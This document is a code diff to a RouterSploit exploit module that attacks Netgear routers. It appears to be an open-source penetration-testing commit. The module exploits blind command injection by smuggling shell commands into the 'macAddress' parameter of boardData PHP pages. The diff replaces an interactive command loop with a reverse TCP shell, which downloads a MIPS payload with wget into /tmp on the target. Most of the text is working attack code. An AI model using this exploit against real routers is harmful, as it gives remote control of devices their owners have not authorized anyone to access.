Netgear Multi RCE exploit reverse tcp (#233)

routersploit/modules/exploits/netgear/multi_rce.py

@@ -2,12 +2,12 @@ from routersploit import (
     exploits,
     print_status,
     print_success,
-    print_info,
     print_error,
     random_text,
     http_request,
     mute,
     validators,
+    shell,
 )
 
 
@@ -48,6 +48,8 @@ class Exploit(exploits.Exploit):
     target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
     port = exploits.Option(80, 'Target Port')
 
+    arch = exploits.Option('mipsbe', 'Target architecture: mipsbe, mipsle')
+
     resources = ['boardData102.php', 'boardData103.php', 'boardDataNA.php', 'boardDataWW.php', 'boardDataJP.php']
     valid_resource = None
 
@@ -55,20 +57,15 @@ class Exploit(exploits.Exploit):
         if self.check():
             print_success("Target is vulnerable")
             print_status("Invoking command loop...")
-            print_status("It is blind command injection - response is not available")
-            self.command_loop()
+            print_status("It is blind command injection - response is not available. Use reverse_tcp <reverse ip> <port>")
+
+            if self.arch == "mipsbe":
+                shell(self, architecture="mips", method="wget", binary="wget", location="/tmp")
+            elif self.arch == "mipsle":
+                shell(self, architecture="mipsel", method="wget", binary="wget", location="/tmp")
         else:
             print_error("Target is not vulnerable")
 
-    def command_loop(self):
-        while 1:
-            cmd = raw_input("cmd > ")
-
-            if cmd in ['exit', 'quit']:
-                return
-
-            print_info(self.execute(cmd))
-
     def execute(self, cmd):
         url = ("{}:{}/{}?writeData=true&reginfo=0&macAddress= "
                "001122334455 -c 0 ;{}; echo #".format(self.target, self.port, self.valid_resource, cmd))